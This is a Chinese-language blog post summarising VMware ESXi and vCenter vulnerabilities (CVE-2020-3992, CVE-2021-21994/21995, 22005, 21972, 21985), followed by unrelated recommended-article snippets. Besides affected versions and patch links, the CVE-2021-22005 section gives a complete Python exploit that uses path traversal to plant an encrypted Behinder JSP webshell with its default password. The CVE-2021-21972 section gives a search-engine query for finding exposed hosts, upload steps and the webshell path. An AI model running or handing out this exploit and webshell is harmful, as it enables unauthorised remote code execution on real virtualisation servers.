李火火安全阁
李火火安全阁

VMware vcenter/ESXI系列漏洞总结

文章目录

  • 前言
  • 漏洞一、VMware ESXI 远程代码执行漏洞(CVE-2020-3992)
  • 漏洞二、VMware ESXI身份验证和拒绝服务漏洞
    • 1、 VMware ESXi SFCB身份验证绕过漏洞(CVE-2021-21994)
    • 2、VMware ESXi OpenSLP拒绝服务漏洞(CVE-2021-21995)
  • 漏洞三、VMware vCenter Server 任意文件上传漏洞复现(CVE-2021-22005)
  • 漏洞四、VMware VCenter未授权任意文件上传漏洞(CVE-2021-21972)
  • 漏洞五、VMware vCenter Server远程代码执行漏洞(CVE-2021-21985)
  • 相关链接

前言

本文章主要对VMware ESXI、VMware VCenter系列进行漏洞整理,更多内容后续补充!

漏洞一、VMware ESXI 远程代码执行漏洞(CVE-2020-3992)

漏洞概述:
漏洞来源于ESXi中使用的OpenSLP存在“use-after-free”释放后重利用问题,当攻击者在管理网络(management network)中时,可以通过访问ESXi宿主机的427端口触发OpenSLP服务的user-after-free,从而导致远程代码执行。
VMware vcenter/ESXI系列漏洞总结_第1张图片
影响范围

受影响产品版本

•	ESXi = 6.5
•	ESXi = 6.7
•	ESXi = 7.0
•	VMware Cloud Foundation (ESXi) = 3.X
•	VMware Cloud Foundation (ESXi) = 4.X

不受影响产品版本

•	ESXi650-202010401-SG
•	ESXi670-202010401-SG
•	ESXi_7.0.1-0.0.16850804
•	VMware Cloud Foundation (ESXi) = 3.10.1.1
•	VMware Cloud Foundation (ESXi) = 4.1

漏洞防护
VMware vcenter/ESXI系列漏洞总结_第2张图片

漏洞二、VMware ESXI身份验证和拒绝服务漏洞

漏洞概述:

VMware ESXi中存在身份验证绕过漏洞(CVE-2021-21994)和拒绝服务漏洞(CVE-2021-21995),攻击者可利用这两个漏洞绕过身份验证和发起拒绝服务攻击。

1、 VMware ESXi SFCB身份验证绕过漏洞(CVE-2021-21994)

由于ESXi中使用的SFCB(Small Footprint CIM Broker)存在身份验证绕过漏洞,具有5989端口访问权限的攻击者可以利用该漏洞发送恶意请求来绕过SFCB身份验证。(注:在默认情况下,ESXi上未启用SFCB服务)

2、VMware ESXi OpenSLP拒绝服务漏洞(CVE-2021-21995)

由于堆越界读取问题,ESXi中使用的OpenSLP存在拒绝服务漏洞。具有427端口访问权限的攻击者可以在OpenSLP服务中触发堆越界读取,从而导致拒绝服务。

影响范围

VMware ESXi 7.0
VMware ESXi 6.7
VMware ESXi 6.5
VMware Cloud Foundation (ESXi) 4.x
VMware Cloud Foundation (ESXi) 3.x

漏洞防护

目前官方已发布安全版本,建议受影响用户及时下载相应补丁包进行防护:

1、CVE-2021-21994:
https://kb.vmware.com/s/article/1025757

2、CVE-2021-21995:
https://kb.vmware.com/s/article/76372

漏洞三、VMware vCenter Server 任意文件上传漏洞复现(CVE-2021-22005)

VMware vcenter/ESXI系列漏洞总结_第3张图片
漏洞概述

在CVE-2021-22005中,攻击者可构造恶意请求,通过vCenter中的Analytics服务,可上传恶意文件,从而造成远程代码执行漏洞。

影响范围

VMware vCenter Server 7.0系列 < 7.0 U2c
VMware vCenter Server 6.7系列 < 6.7 U3o
VMware vCenter Server 6.5系列 不受漏洞影响

安全版本

VMware vCenter Server 7.0 U2c
VMware vCenter Server 6.7 U3o

利用脚本

import requests
import random
import string
import sys
import time
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
 
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
 return ''.join(random.choice(chars) for _ in range(size))
  
def escape(_str):
 _str = _str.replace("&", "&")
 _str = _str.replace("<", "<")
 _str = _str.replace(">", ">")
 _str = _str.replace("\"", """)
 return _str
  
def str_to_escaped_unicode(arg_str):
 escaped_str = ''
 for s in arg_str:
   val = ord(s)
   esc_uni = "\\u{:04x}".format(val)
   escaped_str += esc_uni
 return escaped_str
 
 
def createAgent(target, agent_name, log_param):
 
  
 url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (target, agent_name, log_param)
 headers = { "Cache-Control": "max-age=0", 
       "Upgrade-Insecure-Requests": "1", 
       "User-Agent": "Mozilla/5.0", 
       "X-Deployment-Secret": "abc", 
       "Content-Type": "application/json", 
       "Connection": "close" }
       
 json_data = { "manifestSpec":{}, 
        "objectType": "a2",
        "collectionTriggerDataNeeded": True,
        "deploymentDataNeeded":True, 
        "resultNeeded": True, 
        "signalCollectionCompleted":True, 
        "localManifestPath": "a7",
        "localPayloadPath": "a8",
        "localObfuscationMapPath": "a9" }
         
 requests.post(url, headers=headers, json=json_data, verify=False)
  
 
def generate_manifest(webshell_location, webshell):
 
 manifestData = """
   
    
      
       ServiceInstance
      
      
       content.about.instanceUuid
       content.about.osType
       content.about.build
       content.about.version
      
    
   
   
    
      
       
         vir:VCenter
         
                      
            
             ServiceInstance
            
            
            
          
         
       
      
    
   
   
    
      
       vir:VCenter
      
    
   
 """ % (webshell_location, webshell)
  
 return manifestData
 
def arg():
 parser = argparse.ArgumentParser()
 parser.add_argument("-t", "--target", help = "Target", required = True)
 args = parser.parse_args()
 target = args.target
 print("[*] Target: %s" % target)
 return target
 
def exec():
 target = arg()
 # Variables
 webshell_param = id_generator(6)
 log_param = id_generator(6)
 agent_name = id_generator(6)
 shell_name = "Server.jsp"
 webshell = """<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>"""
 
 webshell_location = "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % shell_name
 webshell = str_to_escaped_unicode(webshell)
 manifestData = generate_manifest(webshell_location,webshell)
 print("[*] Creating Agent")
 createAgent(target, agent_name, log_param)
 url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (target, agent_name, log_param)
 headers = {"Cache-Control": "max-age=0", 
          "Upgrade-Insecure-Requests": "1", 
          "User-Agent": "Mozilla/5.0", 
          "X-Deployment-Secret": "abc", 
          "Content-Type": "application/json", 
          "Connection": "close"}
 json_data ={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
 requests.post(url, headers=headers, json=json_data, verify=False)
 #webshell连接地址
 url = "%s/idm/..;/%s" % (target, shell_name)
 code = requests.get(url=url, headers=headers,verify=False).status_code
 if code != "404":
   print("webshell地址: %s" % url)
   print("[*]冰蝎3.0 Webshell连接密码: rebeyond" )
 
 else:
   print("未获取到webshell地址")
 
 
if __name__ == '__main__':
 exec()

漏洞四、VMware VCenter未授权任意文件上传漏洞(CVE-2021-21972)

VMware vcenter/ESXI系列漏洞总结_第4张图片
漏洞描述:

CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可。

影响版本

VMware vCenter Server 7.0系列 < 7.0.U1c 

VMware vCenter Server 6.7系列 < 6.7.U3l 

VMware vCenter Server 6.5系列 < 6.5 U3n 

VMware ESXi 7.0系列 < ESXi70U1c-17325551 

VMware ESXi 6.7系列 < ESXi670-202102401-SG 

VMware ESXi 6.5系列 < ESXi650-202102101-SG 测试通过版本

VMware-VCSA-all-6.7.0-8217866 

VMware-VIM-all-6.7.0-8217866 2021-02-24

Fofa查询

Fofa语法-> title=“+ ID_VC_Welcome +”

Poc -> https://x.x.x.x/ui/vropspluginui/rest/services/uploadova
VMware vcenter/ESXI系列漏洞总结_第5张图片
如果404401,则代表不存在漏洞,如果405200,则代表可能存在漏洞

利用方式

使用 Tabbed Postman - REST Client 工具 POST请求上传shell文件 也可使用 postman #注:返回状态码200 SUCCESS即上传成功。
VMware vcenter/ESXI系列漏洞总结_第6张图片
VMware vcenter/ESXI系列漏洞总结_第7张图片
使用冰蝎3.0连接shell 即可! 连接地址:x.x.x.x/ui/resources/shell.jsp、密码3.0默认。

脚本如下

https://github.com/horizon3ai/CVE-2021-21972
https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/

修复建议

vCenter Server7.0版本升级到7.0.U1c
vCenter Server6.7版本升级到6.7.U3l
vCenter Server6.5版本升级到6.5 U3n

漏洞五、VMware vCenter Server远程代码执行漏洞(CVE-2021-21985)

VMware vcenter/ESXI系列漏洞总结_第8张图片
漏洞概述:

该漏洞由于vCenter Server默认启用的插件Virtual SAN Health Check缺少输入验证导致的。能通过443端口访问到vSphere Client(HTML5)的攻击者,可以构造特殊的请求包在目标机器上执行任意代码。

影响版本

VMware vCenter Server 7.0系列 < 7.0.U2b
VMware vCenter Server 6.7系列 < 6.7.U3n
VMware vCenter Server 6.5系列 < 6.5 U3p
VMware Cloud Foundation 4.x 系列 < 4.2.1
VMware Cloud Foundation 4.x 系列 < 3.10.2.1

利用脚本

https://github.com/r0ckysec/CVE-2021-21985
https://github.com/xnianq/cve-2021-21985_exp

VMware vcenter/ESXI系列漏洞总结_第9张图片

相关链接

Vcenter实战利用方式可详情右侧文章链接:https://mp.weixin.qq.com/s/PpH8obumyMYQi95cQLqOSw

你可能感兴趣的:(经验知识总结,VMware,ESXI,VMware,vCenter)

  • 浪潮 M5系列服务器IPMI无法监控存储RAID卡问题. Songxwn 硬件服务器服务器运维
    简介浪潮的M5代服务器,可能有WebBMC无法查看存储RAID/SAS卡状态的情况,可以通过以下方式修改。修改完成后重启BMC即可生效。ESXiIPMITools使用:https://songxwn.com/ESXi8_IPMI/(Linux也可以直接使用)Linux/ESXiIPMITool下载:https://songxwn.com/file/ipmitoolWindows下载:https:/
  • Unity3D 制作MMORPG 3D地图编辑器详解 Thomas_YXQ 3d编辑器Unity3D游戏开发unity开发语言
    前言在MMORPG游戏中,地图编辑器是一个非常重要的工具,可以帮助开发者快速创建复杂的游戏地图。本文将详细介绍如何使用Unity3D制作一个简单的MMORPG3D地图编辑器。对惹,这里有一个游戏开发交流小组,希望大家可以点击进来一起交流一下开发经验呀!创建地图编辑器界面首先,我们需要创建一个新的Unity项目,并在场景中创建一个空的GameObject作为地图编辑器的主要控制器。然后,我们可以使用
  • 成都百洲文化传媒有限公司电商新浪潮的领航者 cdbaizhou 成都百洲文化新媒体运营
    在当今电商行业风起云涌的时代,成都百洲文化传媒有限公司以其独特的视角和专业的服务,成为了众多商家争相合作的伙伴。今天,就让我们一起走进百洲文化的世界,探索其背后的成功密码。一、百洲文化的崛起之路成都百洲文化传媒有限公司成立于电商蓬勃发展的大背景之下,公司自成立以来,始终坚持以客户需求为导向,以创新驱动发展。在电商服务领域,百洲文化凭借其深厚的行业经验和敏锐的市场洞察力,为众多品牌商家提供了全方位的
  • 30天告别单身?可行吗?先踏出第一步吧! 囫囵思
    情感经历每个人都会有。到现在还单着的,有些人可能清楚之前不成功的根本原因。不过我想大部分人可能并不清楚。一般来说,每个人都会有失败的感情经历,那么这些失败过的人试错后所总结出来的经验、方法和套路是否对后来的人有助益呢?答案可能是“有”。有的人经过七八年的长跑才修成正果,有的人可能在30天内就解决了单身的问题。这两种都没有对错,都是一套方案,只是看你选择了哪一种。有那么一句话叫做“不以结婚为目的的谈
  • 企业案例库 康森爱学习
    目前进度:福州提交了“坤兴海洋”案例内容,已经整理出本案例对外版本(初稿),对内版本是在对外版本基础上,新增推动经验,目前还未整理。漳州分会的案例还未提交,夏艳同意整理。厦门分会案例还未整理,倾向“仁铭创投”遇到问题:下属分会对案例库的兴趣不大,没有直接收益,怎么让下属分会有动力去推动案例库建设。案例来源于下属分会,他们的态度很关键。两条思路:第一,把入选案例库作为一种荣誉,反馈给企业,以此给分会
  • 深度学习如何入门? 科学的N次方 深度学习
    入门深度学习需要系统性的学习和实践经验积累,以下是一份详细的入门指南,包含了关键的学习步骤和资源:预备知识:•编程基础:熟悉Python编程语言,它是深度学习领域最常用的编程语言。确保掌握变量、条件语句、循环、函数等基本概念,并学习如何使用Python处理数据和文件操作。•数学基础:理解线性代数(矩阵运算、向量空间等)、微积分(导数、梯度求解等)、概率论与统计学(期望、方差、概率分布、最大似然估计
  • 自媒体运营培训机构,全媒体运营师 配音新手圈
    一、自媒体运营培训的重要性自媒体运营培训对于想要在自媒体领域发展的人来说非常重要。兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译、配音、无门槛、插画、翻译、等等。。。每日更新兼职。通过培训,可以了解自媒体运营的基本原理和技巧,提高自己的运营能力和实战经验。二、如何选择合适的自媒体
  • 渡劫 希希家的陌上花开
    现场确认的时间到了,突然间说要户口本。我掐指一算,寄过来时间不够,突然间脑子懵了,我不知道是该开心还是难过。开心的是,原来冥冥之中上天放弃了我,对于专业可能我会另谋他路;难过的是,付出了这么多,最后连考场都没上,会不会很遗憾,一年仅此一次。遇见事情了,多问问过来人怎么处理的。虽然可能已成为过去式,各方面不同,但是他们的经验,或者能帮助到你。我先给招生办打电话,不巧的是人家下班了…给爸妈联系,他们真
  • 百度网盘cps分销佣金玩法揭秘!网盘联盟分销赚钱方法! 高省浮沉000018
    在百度网盘联盟目前有3种赚钱方式,第一种是自己售卡赚佣金;第二种是外链分享(分销联盟);第三种是邀请好友加盟,好友售卡,自己得提成收入。在下面,我将为大家带来详细的加入教程、赚钱经验、三种不同的赚钱方式讲解、以及各种规则。该文章内容可能较长,大家耐心观看别忘了点个赞哟。怎么加入(盘主申请入口在哪)答案:通过微信扫二维码加入(完全免费)扫二维码入口:加入步骤1.首先,我们在上方使用微信扫描二维码,然
  • 浪费削减与价值最大化:精益管理原则的力量 张驰课堂 精益管理
    精益管理(LeanManagement)是一种旨在提升效率、减少浪费并使用经验主义原则对组织进行持续改进的管理哲学。它起源于丰田生产方式(ToyotaProductionSystem),经常与精益制造或精益思想(LeanThinking)联系在一起。精益管理的核心原则主要包括:价值的定义:首先,精益管理要求组织确定什么对顾客而言是有价值的。价值定义是精益管理的起点,确保所有的努力都集中在提高顾客价
  • 第一百六十一章 why we fight? 羊儿小白
    第一百六十一章whywefight?“那是什么?”唐冠杰看着显示屏上的亮点问道。“亮斑!”我正在输液头也没回,边上自有人替我回答。“我猜……应该和那具尸体有关吧?”唐冠杰或许作战经验不足,但他智商绝对不低。(疑问a+疑问B+疑问c)*推测=答案!“好聪明的孩子!”狼人盯着屏幕同样没有回头只是平著移了移脑袋把脸贴过来点说道。“不是我的孩子!”他的话仿佛在称赞我的儿子一般。令我想起了不知下落的婴孩心中
  • 2020-07-27 伙瓣课堂
    HR创造价值的出路——三大方向HR的成长路径大概可以分为两条:一是科班出生,接受过人力资源管理系统教育,而后顺理成章走向HR岗位;二是半路出家,并无扎实的人力资源管理专业知识,但有过业务部门工作经验,因为某种原因转型为HR。两种路径形成了两种先天不足,前者缺对于业务的理解,后者缺对于专业的理解。即使懂一些业务,有一些专业,HR们的发展还有一层天花板——对于生意的理解。这又源自于一个业界陋习——故步
  • 【1104Day63】复盘翻盘 狸老撕
    [月亮]【今日回顾】001今天干了啥退掉网购的衣服去婆婆家吃饭完成亲子手工作业心理课学习、听书002今日输入/输出了啥剽悍晨读(睡出生产力)(激素的威胁)武志红的心理课《读懂你的人生的脚本》、问答及预习听书《异类》复盘003今天为健康美腻努力了咩?今天休息睡了个傍晚小觉【经验/教训/流程总结】看了一些健身方面的文章,都是说每周运动3~4次最佳,不由地感到自己天天运动有些疲惫,身体和思想上都有点儿累
  • 高三物理复习之我见 芦荟葱葱
    附上高三总结会上因成绩优异做的经验分享,希望得到各位同仁的批评指正!尊敬的领导、老师们:下午好!感谢领导和老师给我这次机会!在李校长和王校长的领导下,高三级部上下一盘棋,工作讲方法,办事讲效率。每一位高三老师秉承“山高我为峰,人优我英雄”的英雄品质,克己奉公,锐意进取,为学校更快更好发展贡献着自己的力量。作为高三的一份子,下面汇报一下个人工作,希望得到领导和老师们的批评指正,以求在以后的教学工作中
  • 教师资格证备考全攻略 纳兰飞雪
    这几天家人生病了,每天都跑医院,体力累,心更累,为了完成日更任务发一篇以前写的旧文。2018年我报名了小学语文教师资格证考试,历经波折终于拿到了证书,我知道教师资格证是一个很受欢迎的证书,很多姐妹们也在备考,所以分享一下我的备考经验,给有志于此的朋友们参考。一、我为什么要报考教师资格证?有姐妹们留言问我为什么要考教师资格证?其实十多年前我已经拿到了大学教师资格证,那为什么我还要去考一个小学教师资格
  • “认认”就是我的神器,它把我变成团队的榜样 Prince1021
    “认认”就是我的神器,我是健身房的教练,我加入这个团队,第一个任务就是招聘学生。老板给我时间不多,我用我的经验来天天推销健身房优惠活动,每天晚上6点到健身房周边来宣传,向各种各类的人群发宣传单,但人家最起码拿单子,就是可怜我,我就变成要饭的了,我真的很累,每天到10点不断发单,但没有招聘几个学生,老板经营不好,天天催我,想要找多的学生,但我一直没有办法,还是那个样。最近我朋友给我推荐了“认认”手机
  • 我國農歷(陰歷)的编著者 芮峻
    我国的农历(阴历)很精确,我一直认为是几千年朴素的我国劳动人民在劳动耕作的过程中对地球运行、气候变迁的经验总结,读了作者水木亚丁的文章才知道这鲜为人知的历史事实。我国农历(阴历)的编著者作者:水木亚丁中国的农历是德国传教士汤若望编著的。农历新春就要来临,我们是否知道中国现行农历是外国传教士编著的?一直惊叹于我国现行的农历,觉得很精确。曾经的宣传教育讲的,这是中国几千年朴素的劳动人民在劳动耕作过程中
  • 浅显易懂的科普「磨玻璃结节」 ab1f4f1a7eb6
    全文版权大斌所有,未经授权不得不署名转发。背景:前男友于2018年4月份查出磨玻璃结节。在7月份于上海市肺科医院就诊,并且最终在7月底进行了手术。当磨玻璃结节已经慢慢成为了大家生活当中不可避免的话题,各位大咖写的文章,又让人晦涩难懂,很多话都没有明白的说出来,所以作为一个业外人士,我把我自己所有收集到的资料和经验告诉大家,虽然不会像医生那样晦涩难懂,但是会简单的说出大概的结论,都是根据各大医生以及
  • 关于虚拟机下安装CentOS7及C++开发环境的搭建 dllmayday C++
    由于平时工作的环境就是在服务器端的CentOS上进行C++的开发,所以周末闲来无事就在自己的电脑上安装了虚拟机,然后再虚拟机上安装的CentOS的操作系统。虚拟机软件用的是VMwareworkstation12版本的,安装按照引导直接进行安装即可,没有太大的问题。产品密钥可以在网上找。虚拟机安装完之后接下来是CentOS7系统的安装。CentOS系统是RedHat系统的开源系统,在Linux的各个
  • 2022-05-19感恩写感恩日记 如意心虹
    昨天看到一个微信文的标题,”17秒的纯念=2000小时行动量“,确实挺震撼我的。同时写感恩日记,难道不是将自己的注意力关注聚焦在美好的人事物方面,让自己保持正念纯念的最好方式之一吗?基于去年秋天,读书会的一位伙伴分享她的儿子考上清华大学的成功经验,一方面是儿子自己有清晰精准的梦想,想要成为一名科学家,由此有自己的高中三年规画;一方面是她做为妈妈,自己勤奋学习,不懈上进的榜样引领。同时她分享了一个她
  • 思考,快与慢 马唐
    20180521,思考,快与慢之读书笔记:我们经常在自己出现失误的时候还信心满满,此时,旁观者往往比我们自己更容易发现这些失误。我们的主观判断是存在成见的:人们把相似度当成一种简单的启发手段,就是经验法则,来作艰难的判断。对这种启发性手段的依赖必然会造成其预测带有成见。对经验法则的依赖必然会导致人们判断时的成见。人们是根据从记忆中提取信息的容易程度来估测事情的重要程度的。本书重复出现的一个主题就是
  • 学习怎样学习~罗胖精选 菲笔记
    关于学习是一件令人很头痛的事情,在这里我有几点经验分享给您。如果说学习啊,最好的学习对象就是像孩子一样学习,我想当我说像孩子一样学习的时候您肯定特别的不屑于,您觉得你怎么可能像孩子一样学习呢,孩子的学习还是您教的呢?以下几点我想是对像孩子学习有很好的说服力:1、极度专注(戴眼镜的父母回忆一下,孩子小时候是怎样抢您的眼睛的,是不是孩子的速度没有那么快,但是还是很轻松的抢到您的眼睛,让您猝不及防。那是
  • hr跟我说从第二个问题就可以停止面试了 lozhyf 面试职场和发展开发语言面试
    #24届软开秋招面试经验大赏#但是他还是跟我聊了一个多小时很有耐心,哎,而且当场根据我不会或者答得不好的问题教我es6新特性解释下事件循环看事件循环的代码解释一下输出顺序写js循环算法总结多巩固js基础这个是js游戏岗,我是25届的作者:阿北Char
  • 剽悍财富行动营:10年创业生涯,如何用22天时间再次升级? 洛柒姑娘
    文/楷爸我是楷爸,一名80后创业者。我大学毕业后的前五年曾经十分迷茫。当过两年多中学教师,也跟初创团队创业过,项目亏损千万,最终失败。后来进了国企当白领,一直找不到自己的定位十分痛苦。毕业五年后再次创业,这次创业吸取了之前的失败经验,做了很多调整,定位清晰,一走就是十年。其中一家淘宝店铺做到了3皇冠级别。最近十年我一直在电商圈子工作学习,虽然也不断的改进修正,但是已经遇到了瓶颈期。怎么突破天花板?
  • Java基础知识总结(下) Yonagi833 Java面经and八股java开发语言职场和发展程序人生spring
    本文部分内容节选自JavaGuide,地址:https://javaguide.cn/java/basis/java-basic-questions-03.html基础(上)→基础(中)→基础(下)异常Java异常类层次图概览Exception和Error有什么区别?在Java中,所有的异常都有一个共同的祖先java.lang包中的Throwable类.Throwable类有两个重要的子类:Exc
  • Linux 网络接口管理 不知道写什么的作者 linux
    为了更深入的了解linux系统,为此做出网络接口管理的知识总结。看起来麻烦,其实一点都不难,相信多看多了解总会是没错的!❤️❤️一起加油吧!✨✨文章目录前言一、网络配置的文件介绍二、网卡配置文件三、本地域名解析文件四、DNS解析文件五、主机名配置文件六、常用网络命令前言Linux网络接口管理涵盖了对Linux操作系统中各种网络接口的配置、监控和故障排查等工作。网络接口是操作系统与物理或虚拟网络设备
  • 去湖北恩施旅游4-5天自由行攻略及花费,最佳路线亲身体验! 摄影博主分享
    去湖北恩施旅游4-5天自由行攻略及花费,最佳路线亲身体验!去恩施自驾游路好走吗?有哪些必玩的景点,建议不要自驾游,山区的路况不是很好,山路崎岖,出行旅游安全最重要。去恩施自驾游个人经验分享给大家参考!恩施旅游攻略,在恩施留下美好的回忆,亲自体验恩施旅游经历分享,给需要去的游客朋友做一下参考!如果能抽出5分钟耐心看完我这篇文章,一定会让你在恩施的旅游途中少走弯路,亲身体验!婷婷导游为人亲和,服务态度
  • 了解自己1 梨花树下
    今天关于跟主管沟通事情的过程中我看到了之前未曾看到过的自己都的内心。遇到一件事情,正确的流程应该是看到事情思考事情如何做,遇到的疑问先一一确认之后对事情掌握了着手做。而我到流程里没有一一确认这个环节,大脑会自动忽略掉这个环节,大脑会根据以往的经验给我它认为的是这样做的指示。为什么会忽略掉这么重要的环节,我今天好像明白了一点,我是害怕向给我指示的人确认,是的,是害怕;具体为什么我不是很清楚,但就在刚
  • 机器学习是什么 三花学编程 机器学习
    机器学习是什么?机器学习,这一词汇在当今的科技领域中可谓炙手可热,其影响深远,不仅改变了科学研究的方式,也推动了社会的快速发展。那么,机器学习到底是什么呢?机器学习,顾名思义,是机器(通常指计算机)进行学习的过程。这个过程模仿了人类的学习方式,通过经验积累,不断优化自身性能,最终能够在没有人类直接干预的情况下,进行决策或预测。简单来说,机器学习就是让计算机具备从数据中学习并自动改进的能力。机器学习
  • 基于USDT的日志优化 塵觴葉 linuxUSDT日志优化
    嵌入式应用的日志管理据笔者的经验,嵌入式设备端的日志管理通常比较糟;举个例子,笔者以前统计过在一些安卓设备上,每小时安卓APP生成的日志量约为4.5GB。尽管安卓系统的日志管理系统是原生的,但这么大的日志生成量确实给设备带来比较大的负载(尤其当日志需要保存到文件中时)。这固然与嵌入式软件研发管理脱不开关系,但我们仍然需要寻找相应的解决办法——尤其对于一个没有研发管理权限的开发人员(如笔者),不可能
  • VMware Workstation 11 或者 VMware Player 7安装MAC OS X 10.10 Yosemite iwindyforest vmwaremac os10.10workstationplayer
    最近尝试了下VMware下安装MacOS 系统, 安装过程中发现网上可供参考的文章都是VMware Workstation 10以下, MacOS X 10.9以下的文章, 只能提供大概的思路, 但是实际安装起来由于版本问题, 走了不少弯路, 所以我尝试写以下总结, 希望能给有兴趣安装OSX的人提供一点帮助。     写在前面的话: 其实安装好后发现, 由于我的th
  • 关于《基于模型驱动的B/S在线开发平台》源代码开源的疑虑? deathwknight JavaScriptjava框架
    本人从学习Java开发到现在已有10年整,从一个要自学 java买成javascript的小菜鸟,成长为只会java和javascript语言的老菜鸟(个人邮箱:[email protected]) 一路走来,跌跌撞撞。用自己的三年多业余时间,瞎搞一个小东西(基于模型驱动的B/S在线开发平台,非MVC框架、非代码生成)。希望与大家一起分享,同时有许些疑虑,希望有人可以交流下 平台
  • 如何把maven项目转成web项目 Kai_Ge mavenMyEclipse
    创建Web工程,使用eclipse ee创建maven web工程 1.右键项目,选择Project Facets,点击Convert to faceted from 2.更改Dynamic Web Module的Version为2.5.(3.0为Java7的,Tomcat6不支持). 如果提示错误,可能需要在Java Compiler设置Compiler compl
  • 主管??? Array_06 工作
    转载:http://www.blogjava.net/fastzch/archive/2010/11/25/339054.html 很久以前跟同事参加的培训,同事整理得很详细,必须得转! 前段时间,公司有组织中高阶主管及其培养干部进行了为期三天的管理训练培训。三天的课程下来,虽然内容较多,因对老师三天来的课程内容深有感触,故借着整理学习心得的机会,将三天来的培训课程做了一个
  • python内置函数大全 2002wmj python
    最近一直在看python的document,打算在基础方面重点看一下python的keyword、Build-in Function、Build-in Constants、Build-in Types、Build-in Exception这四个方面,其实在看的时候发现整个《The Python Standard Library》章节都是很不错的,其中描述了很多不错的主题。先把Build-in Fu
  • JSP页面通过JQUERY合并行 357029540 JavaScriptjquery
    在写程序的过程中我们难免会遇到在页面上合并单元行的情况,如图所示 如果对于会的同学可能很简单,但是对没有思路的同学来说还是比较麻烦的,提供一下用JQUERY实现的参考代码 function mergeCell(){         var trs = $("#table tr"); &nb
  • Java基础 冰天百华 java基础
    学习函数式编程 package base; import java.text.DecimalFormat; public class Main { public static void main(String[] args) { // Integer a = 4; // Double aa = (double)a / 100000; // Decimal
  • unix时间戳相互转换 adminjun 转换unix时间戳
    如何在不同编程语言中获取现在的Unix时间戳(Unix timestamp)? Java time JavaScript Math.round(new Date().getTime()/1000) getTime()返回数值的单位是毫秒 Microsoft .NET / C# epoch = (DateTime.Now.ToUniversalTime().Ticks - 62135
  • 作为一个合格程序员该做的事 aijuans 程序员
    作为一个合格程序员每天该做的事 1、总结自己一天任务的完成情况 最好的方式是写工作日志,把自己今天完成了什么事情,遇见了什么问题都记录下来,日后翻看好处多多 2、考虑自己明天应该做的主要工作 把明天要做的事情列出来,并按照优先级排列,第二天应该把自己效率最高的时间分配给最重要的工作 3、考虑自己一天工作中失误的地方,并想出避免下一次再犯的方法 出错不要紧,最重
  • 由html5视频播放引发的总结 ayaoxinchao html5视频video
    前言   项目中存在视频播放的功能,前期设计是以flash播放器播放视频的。但是现在由于需要兼容苹果的设备,必须采用html5的方式来播放视频。我就出于兴趣对html5播放视频做了简单的了解,不了解不知道,水真是很深。本文所记录的知识一些浅尝辄止的知识,说起来很惭愧。   视频结构   本该直接介绍html5的<video>的,但鉴于本人对视频
  • 解决httpclient访问自签名https报javax.net.ssl.SSLHandshakeException: sun.security.validat bewithme httpclient
         如果你构建了一个https协议的站点,而此站点的安全证书并不是合法的第三方证书颁发机构所签发,那么你用httpclient去访问此站点会报如下错误   javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path bu
  • Jedis连接池的入门级使用 bijian1013 redisredis数据库jedis
    Jedis连接池操作步骤如下:         a.获取Jedis实例需要从JedisPool中获取;         b.用完Jedis实例需要返还给JedisPool;         c.如果Jedis在使用过程中出错,则也需要还给JedisPool; packag
  • 变与不变 bingyingao 不变亲情永恒
    变与不变    周末骑车转到了五年前租住的小区,曾经最爱吃的西北面馆、江西水饺、手工拉面早已不在,    各种店铺都换了好几茬,这些是变的。    三年前还很流行的一款手机在今天看起来已经落后的不像样子。    三年前还运行的好好的一家公司,今天也已经不复存在。    一座座高楼拔地而起,
  • 【Scala十】Scala核心四:集合框架之List bit1129 scala
    Spark的RDD作为一个分布式不可变的数据集合,它提供的转换操作,很多是借鉴于Scala的集合框架提供的一些函数,因此,有必要对Scala的集合进行详细的了解   1. 泛型集合都是协变的,对于List而言,如果B是A的子类,那么List[B]也是List[A]的子类,即可以把List[B]的实例赋值给List[A]变量   2. 给变量赋值(注意val关键字,a,b
  • Nested Functions in C bookjovi cclosure
      Nested Functions 又称closure,属于functional language中的概念,一直以为C中是不支持closure的,现在看来我错了,不过C标准中是不支持的,而GCC支持。   既然GCC支持了closure,那么 lexical scoping自然也支持了,同时在C中label也是可以在nested functions中自由跳转的
  • Java-Collections Framework学习与总结-WeakHashMap BrokenDreams Collections
            总结这个类之前,首先看一下Java引用的相关知识。Java的引用分为四种:强引用、软引用、弱引用和虚引用。         强引用:就是常见的代码中的引用,如Object o = new Object();存在强引用的对象不会被垃圾收集
  • 读《研磨设计模式》-代码笔记-解释器模式-Interpret bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * 解释器(Interpreter)模式的意图是可以按照自己定义的组合规则集合来组合可执行对象 * * 代码示例实现XML里面1.读取单个元素的值 2.读取单个属性的值 * 多
  • After Effects操作&快捷键 cherishLC After Effects
    1、快捷键官方文档 中文版:https://helpx.adobe.com/cn/after-effects/using/keyboard-shortcuts-reference.html 英文版:https://helpx.adobe.com/after-effects/using/keyboard-shortcuts-reference.html 2、常用快捷键
  • Maven 常用命令 crabdave maven
